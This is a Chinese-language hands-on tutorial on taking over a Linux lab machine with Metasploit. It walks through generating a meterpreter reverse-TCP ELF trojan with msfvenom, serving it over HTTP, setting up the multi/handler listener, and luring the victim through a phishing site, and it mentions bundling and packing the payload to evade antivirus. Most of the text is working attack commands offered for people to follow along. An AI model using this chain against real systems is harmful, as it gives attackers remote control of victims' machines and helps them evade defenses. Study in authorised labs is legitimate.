MSF 反弹 Shell 实战教程:从生成木马到获取服务器权限

MSF 反弹 Shell 实战教程:从生成木马到获取服务器权限 声明本文仅用于技术交流与安全防御研究请勿用于非法用途。一、这篇文章讲什么很多新手拿到 MSFMetasploit Framework不知道从哪里开始。这篇文章不讲复杂原理只讲怎么一步步用 MSF 拿到一台 Linux 服务器的权限。你可以把它当成一份 MSF 使用教程跟着敲命令就能看到效果。二、环境说明靶机CentOS 7192.168.66.136攻击机Kali Linux192.168.66.130三、核心流程就三步第一步生成木马 → 第二步监听等待 → 第三步让靶机运行木马四、复现步骤真实攻防演练中攻击者不一定会找到 Web 漏洞。钓鱼 社会工程学是最常见的突破口——构造一个仿真的网站让受害者访问诱使受害者下载运行木马。第一步在 Kali 上生成木马 payload# 使用 msfvenom 生成 Linux 反弹 shellELF 格式 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.66.130 LPORT4444 -f elf -o shell.elf参数说明-p linux/x64/meterpreter/reverse_tcpLinux 64 位的 meterpreter 反向 TCP payloadLHOST192.168.66.130Kali攻击机的 IPLPORT4444Kali 上监听的端口-f elf输出 ELF 可执行文件格式实际攻击中攻击者会使用捆绑器如msfvenom -x将 payload 注入到正常的 PDF 阅读器或安装包中或对 ELF 文件进行加壳混淆以降低杀软查杀率。本文聚焦后渗透阶段故使用裸 payload 演示。第二步布置钓鱼页面诱导下载攻击者在 Kali 上搭建一个模拟的网站让靶机访问点击shell.elf将木马下载到靶机(关闭防火墙)# Kali 上起一个 HTTP 服务提供木马下载 python3 -m http.server 2233第三步启动 MSF handler 等待回连# 在 Kali 上启动 MSF 监听 msfconsole -q msf6 use exploit/multi/handler msf6 exploit(multi/handler) set PAYLOAD linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) set LHOST 192.168.66.130 msf6 exploit(multi/handler) set LPORT 4444 msf6 exploit(multi/handler) set ExitOnSession false msf6 exploit(multi/handler) exploit -j # [*] Started reverse TCP handler on 192.168.66.130:4444第四步受害者下载并运行木马在 Kali 上看到 session 建立# 受害者靶机的 cai 用户下载木马elf后执行 chmod x /home/cai/下载/shell.elf /home/cai/下载/shell.elf 攻击者现在通过 meterpreter 完全控制了目标机器权限为运行木马的cai普通用户。